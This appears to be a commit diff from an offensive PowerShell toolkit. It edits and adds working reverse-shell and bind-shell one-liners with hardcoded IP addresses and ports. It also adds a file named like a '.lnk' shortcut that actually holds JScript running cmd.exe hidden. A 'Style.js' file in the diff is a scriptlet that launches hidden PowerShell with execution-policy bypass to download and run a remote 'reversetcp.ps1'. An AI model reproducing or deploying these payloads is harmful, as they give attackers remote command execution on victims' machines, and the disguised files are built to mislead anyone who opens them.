Removed requires from WebCredentials and Prasadhak

Author: samratashok

Gather/Get-WebCredentials.ps1

@@ -1,5 +1,3 @@
-#Requires -Version 3
-
 function Get-WebCredentials
 {
 <#

Gather/Show-TargetScreen.ps1

@@ -21,7 +21,7 @@ The IP address to connect to when using the -Reverse switch.
 The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
 
 .EXAMPLE
-PS > Show-TargetScreen -Reverse -IPAddress 192.168.2301.1 -Port 443
+PS > Show-TargetScreen -Reverse -IPAddress 192.168.230.1 -Port 443
 
 Above shows an example of aa reverse connection. A netcat/powercat listener must be listening on 
 the given IP and port. 

Prasadhak/Invoke-Prasadhak.ps1

@@ -1,5 +1,3 @@
-#Requires -Version 3
-
 function Invoke-Prasadhak
 {
 

Shells/Invoke-PowerShellTcpOneLine.ps1

@@ -1,5 +1,6 @@
-#Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well.
+#A simple and small reverse shell. Options and help removed to save space. 
+#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
 #$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 
-#Even smaller reverse shell. Could fit in Two Tweets.
+#Even smaller reverse shell. Could fit in Two Tweets.Don't use with the above reverse shell. 
 #$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Shells/Invoke-PowershellTcpOnelineBind.ps1

@@ -0,0 +1,2 @@
+#Uncomment and change the hardcoded port number (443) in the below line. Remove this help comment as well.
+#$listener = [System.Net.Sockets.TcpListener]443;$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()

Shortcut to File Server.lnk

@@ -0,0 +1,2 @@
+c = "cmd.exe";
+r = new ActiveXObject("WScript.Shell").Run(c,0,true);

Style.js

@@ -0,0 +1,34 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+	<!--  License: BSD3-Clause -->
+
+    <script language="JScript">
+		<![CDATA[
+	
+			ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
+            c = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.36/reversetcp.ps1'));";
+            r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
+	
+		]]>
+	</script>
+    </registration>
+
+    <public>
+    <method name="Exec"></method>
+    </public>
+	<script language="JScript">
+		<![CDATA[
+	        
+            function Exec()
+            {
+			    ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
+                c = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.36/reversetcp.ps1'));";
+                r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
+	        }
+		]]>
+</script>
+</scriptlet>